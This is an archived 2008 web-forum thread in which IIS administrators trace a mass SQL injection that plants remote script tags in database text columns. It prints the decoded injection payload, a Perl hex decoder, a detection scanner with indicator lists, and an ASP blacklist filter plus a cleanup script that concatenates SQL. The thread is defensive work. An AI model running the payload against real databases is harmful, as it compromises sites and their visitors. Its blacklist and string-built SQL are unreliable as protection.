
Thread: Anyone know about www.nihaorr1.com/1.js?

Last post 12-12-2008 9:14 PM by Paul Bishop. 109 replies.

Page 8 of 8 (110 items)

  • 08-22-2008, 4:22 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    If you are running the RTW version of URLScan 3, the logs are W3C compliant and you can use Log Parser against them. Also, the logs you posted have the SITEID property. That would help narrow down which requests are being blocked.

    You could select the s-siteid property. You could sort it by ID ascending, then compare. That is one way off-hand if you have a lot of sites hitting the DB.

    http://blogs.iis.net/nazim/archive/2008/08/19/urlscan-v3-0-rtw-released.aspx

    Another way would be to create a log parser script that goes through your w3svc files and pipes the data to an external file.  When hunting and pecking like this, copying the affected files to a separate location and hitting with log parser is effective.  You could have a recursive script copy the log to a single location then hit with log parser.  Hope that helps.

    Steve Schofield
    Windows Server MVP - IIS
    http://weblogs.asp.net/steveschofield


    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget
  • 08-22-2008, 6:22 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    When this first happened to me last year, before the massive web attack, I copied all the log files to my Unix box and used grep to parse through the files. It took me a while to pinpoint the injection since it was not in the wild at the time. I had a coder write a decrypt script to decode the hex:

    #!/usr/bin/perl
    use strict;
    use warnings;

    # Hex dump of the injected statement, two hex digits per byte
    my $s=<<"EOF";
    4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F72204355
    52534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E732062205748
    45524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220
    622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2054
    61626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2045584543282755504441
    5445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D2929
    2B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348
    204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
    4F43415445205461626C655F437572736F72
    EOF
    $s =~ s/\s+//g;                # drop the newlines inside the heredoc before decoding
    while (length($s) > 0) {
      my $hex = substr($s, 0, 2);  # take one byte (two hex digits)
      $s = substr($s, 2);
      print pack("C", hex($hex));  # emit it as a character
    }

    Now decoded, you notice that it's what was in the wild:

    DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''<script src=http://www.banner82.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    The question is, have they found a new way to inject without the DECLARE, or a way around dequoting the injection? I have a feeling it's a new type of attack and they don't use a DECLARE.

    I will sift through the logs and see what I can find, but it's hard when you have hundreds of sites and log files.

    It would be great if someone could write a trigger for MSSQL so that any time an update contains %<script etc. it will tell me what site it came from. This would help out greatly, as I can then pinpoint where it came from. Maybe mssql-scan :)

  • 08-25-2008, 10:38 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    OK, I have no idea, but somehow URLScan is not working. I put in the statements of your config and it still got infected today. There must be some way around the DECLARE statement.

    Is there any way to create a trigger on the MSSQL database to tell me from what site the update injects the script code? Since I never insert or update any of my tables with <script in it, I think this will pinpoint where the attack is coming from.

    My URLScan shows it blocking DECLARE and other random injections, but it still gets infected. So I would assume they are no longer using a DECLARE statement, or have a way around the DECLARE statement.

    Again, over 500 sites connect to the same database, so I have no idea how or where the injection comes from.

    I am not a coder, so I would not know where or how to write a trigger to store in a log file where the injection came from.

    Thank you

    silkyfixer

  • 08-26-2008, 12:21 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    The problem is that I can dump all the logs and parse through them, but I don't know what to look for. Since URLScan kicks out the DECLARE, it must be something else.

    silkyfixer
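The Perl decoder earlier in the thread and the question just above about what to look for once URLScan already blocks the literal DECLARE come down to the same check: decode what the request actually carried (URL encoding, then hex runs) before matching keywords, and do it on the Referer and User-Agent fields as well as the query string. The following is an added example, not code from anyone in this thread; it runs over constructed IIS W3C log lines (the field names follow the IIS log format, the site names, paths, hosts and hex payload are invented for the example, the hex being the first bytes of the statement decoded above).

```python
import re
from urllib.parse import unquote_plus

# Keywords of the injected statement decoded earlier in the thread; matched on decoded text only.
INDICATORS = ("DECLARE", "EXEC(", "<SCRIPT", "SYSOBJECTS", "TABLE_CURSOR")
# A 0x-prefixed hex run long enough to carry SQL text (at least 8 bytes).
HEX_RUN = re.compile(r"0x([0-9A-Fa-f]{16,})")
# Request fields the SQL or the script tag can arrive in (query string, UA and Referer server vars).
SCAN_FIELDS = ("cs-uri-query", "cs(User-Agent)", "cs(Referer)")

# Constructed sample log: one clean request, one hex-wrapped statement, one double-encoded Referer.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-sitename cs-method cs-uri-stem cs-uri-query cs(User-Agent) cs(Referer) sc-status
2008-08-22 10:15:01 W3SVC17 GET /products.asp id=42 Mozilla/4.0+(compatible;+MSIE+7.0) http://www.example.com/ 200
2008-08-22 10:15:07 W3SVC17 GET /products.asp id=42;SET+@S=CAST(0x4445434C41524520405420564152434841522832353529+AS+VARCHAR(4000));EXEC(@S);-- Mozilla/4.0 - 200
2008-08-22 10:16:30 W3SVC42 GET /default.asp - Mozilla/4.0 http://www.example.com/?q=%253Cscript+src%3Dhttp://js.example.invalid/1.js%253E 200
""".splitlines()


def decode_hex_runs(text):
    """Replace each 0x... run with the text it encodes; odd-length runs are left alone."""
    def repl(m):
        h = m.group(1)
        return m.group(0) if len(h) % 2 else bytes.fromhex(h).decode("latin-1")
    return HEX_RUN.sub(repl, text)


def decode_field(value):
    """URL-decode twice (double encoding is common), then expand hex runs."""
    return decode_hex_runs(unquote_plus(unquote_plus(value)))


def scan_w3c_log(lines):
    """Return (site, uri-stem, field, decoded value, indicators) for each suspicious field."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names come from the header, not a fixed order
            continue
        if line.startswith("#") or not line.strip():
            continue
        rec = dict(zip(fields, line.split()))
        for f in SCAN_FIELDS:
            decoded = decode_field(rec.get(f, "-"))
            found = [k for k in INDICATORS if k in decoded.upper()]
            if found:
                hits.append((rec.get("s-sitename"), rec.get("cs-uri-stem"), f, decoded, found))
    return hits


if __name__ == "__main__":
    for site, stem, field, decoded, found in scan_w3c_log(SAMPLE_LOG):
        print(f"{site} {stem} [{field}] {found}: {decoded}")
```

The s-sitename column (W3SVCnn) in each hit is the site ID the thread was asking for; the clean request produces no hit because the keywords are only checked after decoding.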

  • 12-12-2008, 9:14 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    This is an SQL injection attack. You must remove the <script ..... to ...</script>.

    It copies itself at the end of any text column it can.

    In ASP:

    <%
    ' Escape single quotes so the value can sit inside a quoted SQL literal
    function stripQuotes(strWords)
        stripQuotes = replace(strWords, "'", "''")
    end function

    ' Strip a blacklist of SQL fragments from the input
    function killChars(strWords)
        dim badChars
        dim newChars
        badChars = array("select ", "drop ", ";", "--", "insert ", "delete ", "xp_", " or ", "or ")
        newChars = strWords
        for i = 0 to uBound(badChars)
            ' vbTextCompare makes the match case-insensitive (replace is case-sensitive by default)
            newChars = replace(newChars, badChars(i), "", 1, -1, vbTextCompare)
        next
        killChars = newChars
    end function

    bco = stripQuotes(killChars(replace(request("bco"), "'", "")))
    %>

    You must use this on all requested data.

    You must even use it on things like request server variables, because the 1.js file link can be attached to OS or REF server vars.

    Do it on the backend as well, or textbox or checkbox or radio: if you're requesting it, it can be attached. No need to worry about session objects unless you request an element and assign it to a session object. Integers are not affected.

    This is a sample script of how to remove it from the DB.

    os is the text column:

    <% response.Buffer = False %>
    <%
    Server.ScriptTimeout = 50000
    dim pida(4500000)
    dim descr(4500000)
    dim i, p, descrx, SQLStmt, RS

    ' dbSubs is the already-open ADODB.Connection to the database
    i = 0
    SQLStmt = "SELECT osid, os From OS "
    Set RS = dbSubs.Execute(SQLStmt)
    ' loop until the recordset is exhausted (the original used an undefined checkrs helper here)
    do while not RS.EOF
        if len(RS("os")) > 0 then
            pida(i) = RS("osid")
            ' strip the injected tag, then drop single quotes so the value can be re-quoted below
            descrx = replace(RS("os"), "<script src=http://17gamo.com/1.js></script>", "")
            descr(i) = replace(descrx, "'", "")
            i = i + 1
        end if
        RS.movenext
    loop

    for p = 0 to (i - 1)
        response.Write pida(p) & " " & descr(p) & "<br>"
        SQLStmt = "UPDATE OS SET os = '" & descr(p) & "' WHERE osid = '" & pida(p) & "' ; "
        Set RS = dbSubs.Execute(SQLStmt)
    next
    %>
